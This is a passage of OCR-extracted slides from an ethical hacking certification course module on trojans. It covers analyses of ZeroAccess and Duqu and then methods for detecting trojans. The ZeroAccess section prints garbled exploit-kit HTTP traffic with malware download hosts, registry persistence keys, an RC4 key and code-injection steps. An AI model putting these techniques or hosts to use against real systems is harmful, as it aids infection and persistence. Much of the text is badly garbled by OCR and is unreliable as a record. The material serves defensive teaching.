e /g i f ' ; le i■7;abs=cun(pya,lei c o n n e c t i o n : k e e p - a l i v e ‫־‬ 11 fertifM | EUkjI IlMkM i d - ’ £rv' x / d i v x d i v i d - ‫ י‬f u d ' x / d i v x d i v i d - ’ hag1 x / d i v ; 5 5 6 0 4 ^ 6 0 1 0 0 0 ; ! 0 . : 5 5 5 2 0 6 5 1 ;.'‫ נ|,.י 1 5 <ו‬H T T F /1 .1 05 Second Stage Exploits 20 0 U o p .a v e ) ;u m » - 'Q I P 5 b 5 7 9 0 h t t p / 1 - 1 ok [ o u l ] ; f u n c t i o n s h h ( u ) ( r e j a t e : Tu e . 25 O c t 2 0 1 1 1 5 : 1 9 : 2 0 GMT v , p , » , £ , r ; a - 'P t d 8 E a m l l E 4 ; e r v < > r : A p a c h e / 2 . 2 . 1 7 ( U n ix ) p h p / 5 . 2 . 1 ? Junction 3 ay(v,w,k) (var k- p o w e r e d -B y : p h p / 5 . 2 . 1 7 .o n te n t- L e n g th : 4096 (v, y) >function 0 rc( 0 )(vajr| - o r r t e p ‫ 51^/1 ■ ־ ■ -' . ־ ך - ‘ ־‬Vce 4 c^T8 4 r3 r 52 5 4 4 c r {S W 5 ^ fT 7 0 1 0 2 OdOc 5 7 0 7 0 4 5e0 2 54 5 4 0 1 0 7 5 c 5 0 0 3 ;1 ; ^ (g, 4) ;ca ' cl)ang2 61n' ;d-ru T ° " t ! | u 5 e r ‫ ־‬A gent : m 071 1 1 W 4 .0 (*1miaw5 xp 5 . 1 ) i l l 17 [x] ;a ♦ ♦ ( If (qC 1! (bar [aj - c a c ^o s t :: T o w u s t a r d . org ■ ■ ) <[ 10 rd. 1 / 3 ,s , k , r , a ; 1-'0 57 50 0 77 6 <e®P A c c e p t: t e x t / h t m i . image/gif, 1mage/1peg, ‫:׳״‬ im a g e /g if , I m a g e /jp e g , :o n n e c tio n : k e e p - a liv e [k] ; ‫ ( ) ♦נ‬try( z-nev Actlv‫־‬r ♦ ZeroAccess Download m a ;9 ■ , ' ‫יזו‬Ld8Em6Q v , k, z, x, v, 3 , h, 1 m /1 , 2 Oct ' “ ,51• K ‫־‬ :> a te : p T u e •1 25 0 0 0K 2 0 1 1 1 5 : 4 9 : 2 1 GMT (», 8 ) ;d-‫ י‬mY9g4a5b8at3Idw. 3 s e r v e r : A p a c h e / 2 .2 . 1 7 ( u n 1 x ) p h p / 5 . 2 . 1 7 •• < -P 0 w e re d ‫ ־‬B y: p h p / 5 . 2 . 1 7 if f (w (vac k, y, s, n,u, r,z * ) ( r , 3 ) ; ‫ י - ב‬Q 9 P E 4 3 0 I 0 8 L P tf e ‫< י‬ : Le •YZoonntt eet enntt --t TDy nsegp:toh s:aipt 2po41n317: c1 a2i tn1loi nn e/ 0; c tfe i1- es nraema em-e m g d E 8 v 6 4 - i i :o n n p t t * -p a d : a v o id b ro w ser bug ZeroAccess Download < _ c a c h e : m i s s fr o m dom a 1n .c o m < e e p - A l1 v e : t i m e o u t - 1 c o n n e c t i o n : K e e p - A liv i aET .pzhlpa ‫>־‬w=19 .e &f fa M di « W i « & c a-i ‫ ־‬o s t: e x e z k * .c n •° ‫־׳׳‬ 8 . . 8F ..p k . J .E .. - L- 82 ,,s e r - A g e n t: o p e ra /6 ‫ י‬C o n n e c tio n : c lo s e 444 78 (w in d o w s mt 5 . 1 ; 44 u; Exploit kit dropping ZeroAccess 5 624 L a n g iD - 4 0 9 ; 6 4 3 x86) http://www.5ymantec.com Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited. T ro jan A nalysis: Z eroA ccess (C ont’d) Source: http://www.symantec.com ZeroAccess can also be installed through web exploit kits. The user is often falsely given the impression they will be installing an update for an application, such as Adobe Flash player. This use of various exploit kits to install ZeroAccess is likely simply a byproduct of its authors attempting to evade IPS rather than an indication of ZeroAccess being sold to other distributors. Module 06 Page 938 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 113. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker SET /0snp91icm/?4 HTTP/ 1 ■1 P/1.1 Hose: lowmustard.org en-US: rv:1.8.1.13) Gecko/20080311 User-Agent: Hozilla/5.0 Main Attack URL ■11/ text/html; q-0. 9, text/plain;q-0. 0, Firefox/2.0.0.13 image/png, */*; q-0.5 Accept: text/xml,applicati Accept-Language: en-us,en;q=0.5 Accept-Encoding: azip,deflate Accept-Charset: ISO-8859-1,utr-8;q-0.7, ; q 0 ‫ד‬ -. Keep-Alive: 300Connection: keep-alive chtmlxbodvxdiv id='wag'x/divxdiv id='lat'x/divxdiv id*'frv'x/divxdiv id=' fud'x/divxdiv id=' haa1 x/div <d!v id‫'־‬raj'></d1V ><divf=ET /0snp?>11an7, ‫~׳‬H^5027aeebF56a:! dl05eieS60905 5604 5c6801 uC 01‫׳‬ uc5 5! 1 5 6 5 1 0' 51 1 5 5 ‫ ׳‬http,/1.1 10. ‫ב‬r r o n t _ o n rn H 1 nn ■ 1 ‫ל‬ ‫1 ־/בד ז‬H P _ n ‫מרד ־‬ / ‫רו רד י ו‬ u, u,a, q,o, z, k,c, j,h, 1 ,c, accept-encoding: pack2 co n ten t- ty p e : ajpp licat 0;q<h;q++) {ot=p: c=f.char user-Aqent: moziillI / 4.0 (w ‫-־‬Agent: M o z I a ;k‫־‬parselnt(c, 1 6 );wH 0 st: Towmustard. org Second Stage Exploits q=.2, q=.<! (anp.fid) ;kat‫' ־‬ bQ3LkY78Y A ccept: te x t/ h tm l, im ag e/gir, 1mage/;)peg, co f 1;l e i 7 ‫;־‬ab3‫־‬run (pya, lei n nectio n: k e e p - a liv e (10p,ave);umm='QIP5&5790 HTTP/1.1 200 OK [oul] ;function shh(u){re Date: Tue, 25 Oct 2011 15:49:20 GMT v,p,w,f ,r;w='Ptd8Ea1rllE4 S e r v e r: A pache/2.2.17 (U n ix ) PHP/5.2.17 function jay(v,m,k) fvar x-Powered-By: PHP/5.2.17 ^ (v, y) )function orc(o) (v«J ontent-Length: 4096 onTejG ‫־‬ET~ V □s‫־ ־‬ np'91 cm/^'l5Vce-e 8 ‘5 ‫4 5? ־‬ ‫ ־‬f3 a ‫־‬ T851‫ ־‬f 5 70102OdOc 570704 5e02 54 5401075c 5003: 1: V (g, 4);c='clkmg26m';d=runconte User-Aqent: i Mozi 11 a/4 .0 6(windows 5x p4 2~J2'5‫־‬ 5 .1 ) [x] ;a++) {if (q(l] (bar [a] [x-cac Host: lc'M nustard.ora l‫׳‬j,z,k,r,a;l-'G575GQ776 Keep- Accept: T ext/htm l, im ag e /g if, image/jpeg, ZeroAccess Download [k] ;‫( )++נ‬try( z=neu Activ:°nne co n nectio n: k e e p - a liv e i ,a;ro- 9 ‫י‬ n Ld6Em6Q' ;a*cun ( ‫ן י‬ ‫^קמ‬ HTTP/1.1 200 OK w, fc , z, x,v, 3 , h, 1, d; z*'ble K-*‫ . . ׳‬D ate: Tue, 25 Oct 2011 15:49:21 GMT (w,8) ;d- ‫»י‬Y9g4a5b8at3 Ida , . s e rv e r: Apache/2.2.17 (u n ix ) p h p /5 .2 .1 7 i n ( ) {var k, y,s,n,u,c2 ‫׳‬r• ••X-Powered-By: PMP/5.2.17 w G. ' 109* 3;(3,‫)ש‬ PE430I08LPtfe ■ .. Content-Length: 243712 ____Y .0 . . . c o n te n t- D is p o s itio n : i n l i n e ; f i lename=emgdE8/6. ontent-T/pe: a p p lic a t io n /o cte t-stre am 8. .8F x‫ ־‬Pad: avo id browser bug ZeroAccess Download . .PK. x-cache: m i s s from domain.com >.E.. K eep -A live: tim eo u t=1! co n nectio n: K e e p - A liv< e t s e§J f fa ? fif d l ^ SJ c ia Host: exe z kz la.cn user-A gent: viz.................................... Juser-A gent: opera/6 (windows NT 5.1; u; LanglD=409; x86) 'c o n n e c tio n: clo se co nectio n : 04 4 4 4 4 5 54 0 4 6 - 3 4 6 15 6 1 FIGURE 6.45: Exploit kit dropping ZeroAccess Module 06 Page 939 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 114. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker T ro ja n A n a ly sis: Z ero A c c e ss (Cont’d) ( ^H (•rtifwd | ttkKJi NmIm Upon execution, ZeroAccess selects a random The Trojan then creates the following registry driver alphabetically between % S y s te m % D r iv e r s c la s s p n p . s y s and entries to ensure the newly infected driver serves as the main load point for ZeroAccess: % S y s t e m % w in 3 2 k . s y s and overwrites the e HKEY_LOCAL_MACHINESYSTEMCurrentCont rolSetServices[FILE n a m e OF INFECTED DRIVER]‫׳‬ImagePath ‫״*" = ״‬ ‫׳‬ driver with its own code The original clean driver is stored in a hidden HKEY_LOCAL_MACHINESYSTEMCurrentCont rolSetServices[FILE NAME OF INFECTED DRIVER]"Type" = "1" encrypted NTFS volume using the file name %System%config<RANDOM CHARACTERS> The hidden volume is used to store the original O HKEY_LOCAL_MACHINESYSTEMCurrentCont rolSetServices[FILE NAME OF INFECTED DRIVER] V'Start" = ”3" clean driver as well as additional components and downloaded payload modules Code is then injected into services.exe through an The volume is roughly 16 M B in size and is APC which encrypts the data stored in the hidden NTFS volume under ? ? A C P I# P N P 0 3 0 3 # 2 & d a accessed through the file system device name: ? ? A C P I# P N P 0 3 0 3 # 2 & d a la 3 f f & 0 m t' °Ry l a 3 f f & 0 U and also creates an alternate data stream file % S y s t e m D r iv e % 2 3 8 5 2 9 9 0 6 2 : 230 22682 73 . e x e and executes it These main loader components ensure the additional payload files stored in the hidden NTFS P volume are loaded and executed http://www.symantec.com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. ^ T ro jan A nalysis: Z eroA ccess (C ont’d) Source: http://www.symantec.com Upon execution, ZeroAccess selects a random driver alphabetically between %System%Driversclasspnp.sys and %System%win32k.sys and overwrites the driver with its own code. The original clean driver is stored in a hidden encrypted NTFS volume using the file name %System%config<RANDOM CHARACTERS>. The hidden volume is used to store the original clean driver as well as additional components and downloaded payload modules. The volume is roughly 16 MB in size and is accessed through the file system device name: ??ACPI#PNP0303#2&dala3ff&0 For example, the original clean driver is stored at: ??ACPI#PNP0303#2&dala3ff&0L[EIGHT RANDOM CHARACTERS]. This file system of the hidden volume is encrypted using RC4 with the following 128-bit key: xFFx7CxFlx64xl2xE2x2Dx4DxBlxCFx0Fx5Dx6FxE5xA0x4 9 The Trojan then creates the following registry entries to ensure the newly infected driver serves as the main load point for ZeroAccess: Module 06 Page 940 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 115. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker © HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[FILE INFECTED DRIVER]‫״‬ImagePath‫״*" = ״‬ NAME OF © HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[FILE INFECTED DRIVER]‫״‬Type1" = ‫"״‬ NAME OF © HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices[FILE INFECTED DRIVER]‫״‬Start3" = ‫"״‬ NAME OF Code is then injected into services.exe through an APC. The injected code encrypts the data stored in the hidden NTFS volume under ??ACP1#PNP0303#2&dala3f f &0u and also creates an alternate data stream file %SystemDrive%2385299062:2302268273.exe and executes it. These main loader components ensure the additional payload files stored in the hidden NTFS volume are loaded and executed. Module 06 Page 941 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 116. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Troj an A nalysis: Duqu Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information CEH U tf IthK lU M rtifW Ji ik Code section, Duqu payload DLL 1010 0000 C++ Standard Template Library functions .100042S O Native C++ code with STL 1000C2C 9 The code section of the Payload DLL is common for a binary consists of "slices" of Payload Other Language C framework / code that may have been initially compiled in separate object files before they were linked in No C++ a single DLL 10023878 + Native C+ code with STL Most of them can be found in any C++ program, like the Standard Template Library 10028F2C (STL) functions, run-time library functions, and user-written code, except the biggest slice that 1002EA 1 D contains most of C&C interaction code Run-Time library code 100M OM Native C code for injection API thunks. Exception handlers http://www.securelist.com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited £ 3 ^ TrojanAnalysis: D u ut* Source: http://www.securelist.com Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information. The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of "slices" of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions, and user-written code, except the biggest slice that contains most of C&C interaction code. Module 06 Page 942 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 117. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Code section, Duqu payload DLL .loooitxio C++ Standard Template Library functions .100042SO Native C++ code with STL .1000CZC9 Payload Other Language / C framework No C++ .10023878 Native C++ code with STL -10028F2C Run-Time library code • 1002EAD1 .100300A4 Native C code for injection API thunks. Exception handlers FIGURE 6.46: Duqu Tool Screenshot Module 06 Page 943 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 118. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Trojan Analysis: Duqu Framework D uqu F ra m e w o rk C o d e P ro p e rtie s S E ve n t D riven F ra m e w o rk Everything is wrapped into objects S Function table is placed directly into the class instance and can be modified after construction S There is no distinction between utility classes (linked lists, hashes) and user-written code S Objects communicate using method calls, deferred execution queues, and event-driven callbacks S There are no references to runtime library functions; native Windows API is used instead CEH Event objects, based on native Windows API handles Thread context objects that hold lists of events and deferred execution queues M Callback objects that are linked to events Event monitors, created by each thread context for monitoring events and executing callback objects Thread context storage manages the I list of active threads and provides access to per-thread context objects I http://www.securelist.com Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. r ^1 ‫ן‬ — T ro jan A nalysis: D uqu F ra m e w o rk Source: http://www.securelist.com This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. It is called the Duqu Framework. Duqu Framework Code Properties The code that implements the Duqu Framework has several distinctive properties: 9 Everything is wrapped into objects 9 Function table is placed directly into the class instance and can be modified after construction 9 There is no distinction between utility classes (linked lists, hashes) and user-written code 9 Objects communicate using method calls, deferred execution queues and event-driven callbacks Module 06 Page 944 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 119. Ethical Hacking and Countermeasures Trojans and Backdoors 9 Exam 312-50 Certified Ethical Hacker There are no references to run-time library functions; native Windows API is used instead Event-Driven Framework The layout and implementation of objects in the Duqu Framework is definitely not native to C++ that was used to program the rest of the Trojan. There is an even more interesting feature of the framework that is used extensively throughout the whole code: it is event driven. There are special objects that implement the event-driven model: 9 Event objects, based on native Windows API handles Q Thread context objects that hold lists of events and deferred execution queues Q Callback objects that are linked to events © Event monitors, created by each thread context for monitoring events and executing callback objects © Thread context storage manages the list of active threads and provides access to perthread context objects Module 06 Page 945 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 120. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Trojan Analysis: Event D riven Fram ew ork C EH J This event-driven model resembles Objective C and its message passing features, 0 but the code does not have any direct references to the language, neither does it look like compiled with known Objective C compilers 0 0 Object 2 Object 2 *L--- X--- Event Object Event Monitor Event Object Callback Object Callback Object Thread Context: Event and Call Queue Object 1 ........... Event Monitor H --- *--- ........... •> Object 1 Thread Context: Event and Call Queue ‫־*־‬ Thread Context Storage Thread Context Storage http://www. securelist,com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. T ro jan A nalysis: E vent D riv en F ram e w o rk Source: http://www.securelist.com The event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, neither does it look like it is compiled with known objective C compilers. Object 2 Object 2 y Event Object Event Monitor Event Object Event Monitor --------- * -------Callback Object Object 1 ‫י‬ 4 --------- *--------Callback Object Thread Context: Event and Cali Queue ........... » Object 1 Thread Context Storage Thread Context: Event and Call Queue Thread Context Storage FIGURE 6.47: Event Driven Framework Module 06 Page 946 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 121. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker M odule Flow So far, we have discussed how a Trojan infects a system and the types of Trojans available. Now we will discuss how to conduct Trojan detection. Trojan detection helps in detecting the presence of Trojans on an infected system and thus helps you in protecting the system and its resources from further loss. Trojan Concepts ,‫• נ‬ Countermeasures Trojans Infection f | j| | ‫ ־‬Anti-Trojan Software ^— Types of Trojans ^ f ^ Trojan Detection ■ 4 v‫— ׳‬ 1 Penetration Testing This section focuses on Trojan detection using various techniques or methods. Module 06 Page 947 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 122. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Scan for suspicious OPEN PORTS Scan for suspicious STARTUP PROGRAMS ■ > 4 Scan for suspicious RUNNING PROCESSES Scan for suspicious FILES and FOLDERS Scan for suspicious REGISTRY ENTRIES Scan for suspicious NETWORK ACTIVITIES 9 0 Scan for suspicious DEVICE DRIVERS installed on the computer Scan for suspicious modification to OPERATING SYSTEM FILES 9 0 9 0 Run Trojan SCANNER to detect Trojans Scan for suspicious WINDOWS SERVICES Cbpyright © by EC-CMMCil. All Rights Jte$ervfed'.;Reproduction is Strictly Prohibited. How to D etect T ro jan s Trojans are malicious programs that masquerade as a useful or legitimate file but their actual purpose is to take complete control over your computer, thereby accessing your files and confidential information. In order to avoid such unauthorized access and to protect your files and personal information, an antivirus product has to be used, which automatically scans and detects the presence of Trojans on your system or you can also detect the Trojans installed on your system manually. The following are the steps for detecting Trojans: 1. Scan for suspicious OPEN PORTS 2. Scan for suspicious RUNNING PROCESSES 3. Scan for suspicious REGISTRY ENTRIES 4. Scan for suspicious DEVICE DRIVERS installed on the computer 5. Scan for suspicious WINDOWS SERVICES 6. Scan for suspicious STARTUP PROGRAMS 7. Scan for suspicious FILES and FOLDERS 8. Scan for suspicious NETWORK ACTIVITIES 9. Scan for suspicious modification to OPERATING SYSTEM FILES 10. Run Trojan SCANNER to detect Trojans Module 06 Page 948 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 123. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker S Trojans open unused ports in victim machine to connect back to Trojan handlers B Look for the connection established to unknown or suspicious IP addresses C:Wi ndowssystem32cmd.exe Si x J: U s e r s A d m ir O n e ts ta t -an| Ic tiv e Connections S ta te P ro to TCP TCP TCP TCP TCP TCP L o c a l A d d re s s 0 .0 .0 .0 :1 3 5 0 .0 .0 .0 :4 4 5 0 .0 .0 .0 :5 5 4 0 .0 .9 .0 : 1 0 2 5 0 . 0 . 0 .0 : 1 0 2 6 0 .0 .0 . 0 : 1 0 2 7 tpp n n 0 a: 1 0 9 f t I.IQTPNINH TCP TCP TCP 0 .0 .0 .0 : 1 0 2 9 0 .0 . 0 . 0 : 2 0 6 ? 0 .0 .0 .0 :5 3 5 7 LISTENING TCP 0 . 0 . a . 0 :1 0 2 4 3 L I S IE N I N G TCP TCP 0 .0 .0 .0 : 2 2 3 5 0 1 2 7 .0 .0 .1 : 1 2 0 2 5 LISTENING LISTENING TC P 1 2 7 .0 .0 .1 :1 2 0 8 0 LISTENING L I S T E N IN G LISTENING L IS T E N IN G LISTENING L IS T E N IN G L IS T E N IN G LISTENING TCP 1 2 7 .0 .0 .1 : 1 2 0 8 0 L IS T E N IN G E S T A B L IS H E D TC P 1 2 7 .0 .0 .1 :1 2 0 0 0 ESTABLISHED TCP 1 2 7 .0 .0 .1 : 1 2 1 1 0 LISTENING < System Administrator > r 5 i 8 ‫ ' ־ 8־‬J : r S I J 8 r S i 8 ‫ ' ־ 8־‬I : TS888 J S A * 8 8 ‫ '־‬I : I S08H : (n rin c N J S V 8 ‫ ־ 8־‬T:2382S IS .V H 'N 'I ‘ 23828 .‫_־‬fj .‫־‬ riZlEM IH C K ld B riZ H E D E2IW Bn 2HED ■Copyrif;ht © by EG-Gouncil. All Rights Jteservfed.;Reproduction is Strictly Prohibited. 0 ‫ כ‬S canning for S uspicious P orts □ a Trojans open unused ports on the victim's machine to connect back to the Trojan handlers. These Trojans can be identified by scanning for suspicious ports. Scan for suspicious ports and look for the connection established to unknown or suspicious IP addresses. 31 C:Windowssystem32cmd.exe C:UsersAdnin'netstat -an Act iue Connect ions Proto TCP ICP TCP ICP ICP ICP ICP TCP ICP TCP ICP ICP ICP ICP ICP ICP TCP Local Address 0.0.0.0:135 0.0.0.0:445 0.0.0.0:554 0.0.0.0:1025 0.0.0.0:1026 0.0.0.0:102? 0.0.0.0:1028 0.0.0.0:1029 0.0.0.0:2869 0.0.0.0:5357 0.0.0.0:10243 0.0.0.0:22350 12?.0.0.1:12025 127.0.0.1:12080 127.0.0.1:12080 127.0.0.1:12080 127.0.0.1:12110 Foreign Address 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 127.0.0.1:53850 127.0.0.1:53852 0.0.0.0:0 State LISTENING LISIENING LISTENING LISIENING LISTENING LISIENING LISIENING LISIENING LISIENING LISIENING LISIENING LISTENING LISIENING LISTENING ESTABLISHED ESTABLISHED LISTENING Type n e t s t a t —a n in command prompt System Administrator FIGURE 6.48: Scanning for Suspicious Ports Module 06 Page 949 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 124. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Port M onitoring Tools: TCPView and C urrPorts TCPView is a Windows program that will show detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections TCPView - Sysintemals: www.sysintemals.com THO Fie Opticns Piocesi View Hdp CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer gr -!m l-Pt C urrPorts | F*e Ed* V!cw Option? Hdp x a i % V V -J S ' « 0 3 t :;> »Pfry: *»< 0 TCP m tcp 772 tcp 772 TCP 772 TCP 772 TCP 772 TCP 77} TCP 773 TC P 773 TC P 773 TC P >1X0 TC P • 3*0 ‫ ז‬cp 3576 TCP ‫ . ה ו‬tcp ‫זד‬ 1B TC 7S P 876‫ נ‬TC P 3876 TC P 3676 TC P 31*6 TC P € c*«cre»9 C c**re»« C !e 3668 ‫י‬ 644 S 44 516 TC P TCP TCPV6 TCP Rerwte 123.17S32U7 123.17S3?1<7 123.175 32.133 123 ITS 3?1‫מ‬ 123.17632.153 f 13953 ISMfrt LocdAddesi w« > w fm»W 1 in ‫«.1 ־‬M wn n?‫4 1 ־‬ v »W .«k 1 wnm?«leMk41 wn m v«lf**k41 m mw:lcMk4l wnmw*>*k4l 44‫*מל‬ 1 ‫׳1 ־«ו‬ ^ ‫ל‬ 1< p13M 0fcrrfeo N > t wp11 MO Invl rp N > . ? 1 3 7 ]?.14/ 2 .1 5 N tp m V 1 1 • rf«V I Ntp /w l 1 1 m l 11ft rrfiV I iW 1 WIN MSiEL f.4K (1 C WWMSSEICMK 0 loedhotf 105? !‫־.־‬fllhM f 1051 h3»HB91«IOO tapi r‫׳‬f.V I Ntpi mv 1 6« *|p 1’!‫״‬ / fl3 1-W 1 mWUll& •(><.! I•... Ittpi W W C lN iO ir WNMSSEICMK WNMr^imK W M rK K N r.n 4 m ‫־‬l£kU41 1u mm « »*eUUk41 Mnfim -kV.4141 mn-imnlcMMI un-fist*W‫<.׳‬k41 WN+t$SELCK4K.. w m <.4k41 in saW W NMSSELCK4K Rem P ote ort Np < Nr. Ntp Nt> Nv Nv 4262 3026 3026 102$ I... Itto WIN MSSELCW .0 K whm ewlck4k41 0 W J MSSELCMK 0 U Sm* TlMf.WAII E$T«U$HED pstab! C tfU FD ST SH aosc.w,»iT r?T*«jy-(rr» r‫*־-־‬n1 ‫־‬ .rrr> I »H4B. • i !• ltSHrtJ44D 1*1 1 1 LS Hr& «I€1g ‫4»ז5 ז‬ *^‫<זז‬ E TM 4 S « jy (D t s t a n ,4 i:! [Siettjy-tfD LlSIENIUi LISTEM .‫־‬ I3 l«TEW3 Proem N* Procn... Plotocol Local Por local Po*... Local Add‫׳‬m i ♦ ♦ • « • ♦ ♦ ♦ • • Syjtcr• $y««m Sytten S>ll*m Sy*fT‫״‬ Syihm SjTMm Sytten Sytten Sytlrm 864 1940 1940 900 1375 BM 47• 1376 Syitcm Syaem Unknown Unknown Unknown Unknown Unknown 500 1900 3702 3702 3702 45C 0 5355 51225 59293 $9294 62058 62060 49244 4924S 492S2 49253 49254 ittkmp :5dp wi-ditco... wi-dmo. • ♦ • 0 ® ♦ C UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP 1040 1940 1940 900 0 0 0 0 0 < Eflabfehe* 22 Listening: 28 53 Total Ports, ‫ ו‬R&nou Connections, 1Selected [::]:500 [C111900 [::1:3702 [::]:3702 wvdtoco... [::]:3702 ■ptec• ‫00)4:]::[ אזמו‬ llmnr [1:1:5355 [::]:5122S [l«d0!:b9M:d01.H [::1JS9294 [::]:62056 [::1:62060 10.00.12:49244 10.00.12:49245 10.00.12:492*2 10.00.12*9253 10.00.12*9254 Remote... Remote _ A 80 ao ao 80 80 http http http http Wtp * > NirSott Proevyare. mtt»vrww.rur*ottn http://technet.microsoft.com http://www. nirsoft.net Copyright © by EG-CMMCil. All Rights ^pS'ervfed'.;Reproduction is Strictly Prohibited. P ort M o n ito rin g Tools: TCPView a n d C u rrP o rts TCPView Source: http://technet.microsoft.com TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and the state of TCP connections. On Windows NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. It provides a more informative and conveniently presented subset of the Netstat program that is shipped with Windows. It works on Windows NT/2000/XP and Windows 98/ME. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions. On Windows XP systems, TCPView shows the name of the process that owns each endpoint. By default, TCPView is updated every second. Endpoints that change state from one update to the next are highlighted in yellow; those that are deleted are shown in red, and new endpoints are shown in green. The user can close established TCP/IP connections (those labeled with a state of ESTABLISHED) and save TCPView's output window to a file as well. Module 06 Page 950 Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 125. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker JM ft File Q L O x I ‫־‬J TC PView - Sysinternals: www.sysinternals.com O p tio n s a Pro ce ss V ie w H elp -< H Process ' ‫[ י‬System Proc... fg chrome.exe chrome.exe fg chrome.exe (• chrome.exe (? chrome.exe chrome.exe chrome.exe chrome.exe G chrome.exe chrome.exe <b edpr server.exe <b edpr_server.exe firefox.exe firefox.exe |) firefox.exe firefox.exe firefox.exe firefox.exe > googletalk.exe L^ ^ Bo o ale td k exe googletalk.exe a “ lsass.exe I “ Isass exe ” services.exe ■ — ‫---------׳‬‫1 ־‬ 772 772 772 772 772 772 772 772 772 772 3380 3380 3876 3876 3876 3876 3876 3876 3688 3688 3688 644 644 636 End p o in ts: 69 Established: 22 t ) 1 f) t ) < PID 0 Piolocol TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TC P TCP TCP TCP TC P TCP TCP TCPV6 TCP Local Address win‫־‬msselck4k41 win-msselck4k41 W1rvmsselck4k41 win-msselck4k41 W1n-msselck4k41 win‫־‬msselck4k41 winmsselck4k41 win-msselck4k41 win-msselck4k41 win-msselck4k41 W1n‫־‬msselck4k41 W IN - M S S ELC K 4 K W l N -MS S E LCK4K.. W IN - M S S ELC K 4 K W l N -MS S E LCK4K.. win-msselck4k41 win*msselck4k41 win-msselck4k41 win-msselck4k41 win-msselck4k41 win-m:; elck4k41 win-msselck4k41 W IN - M S S ELC K 4 K win-msselck4k41 W IN - M S S ELC K 4 K Local Port 4277 4164 4250 4251 4252 4274 4275 4276 4278 4279 4280 12121 12122 1051 1052 1082 4033 4266 4271 1195 4281 4282 1028 1028 1029 Remote Address 123.176.32.147 123.176.32.147 123.176.32.138 123.176.32.138 123.176.32.153 r-199-59-150-9. twt... vipl 3 Ib40 lond. co ... vipl 3. Ib40. lond. co ... 123.176.32.147 maa03s16-in-f27.1... maa03s16-in-f27 1... W l N -MS S E LCK4K... W IN - M SSELC K 4K ... localhost localhost hg-in-f189.1e100.... maa03s16-in-f22.1... maa03s16-in‫־‬f4.1e... maa03s16-in-f2.1 e... ni‫־‬in‫־‬f125.1 e100. net 74.125 236 189 maa03s16-in f29.1, . W IN •MS S E LCK4K... winmsselck4k41 W IN ■MS S E LCK4K... Remote Port http http http http http http http http http http http 0 0 1052 1051 https https https https 5222 http http 0 0 0 « ‫׳‬N State TIM E W A IT E S T A B L IS H E D E S T A B L IS H E D E 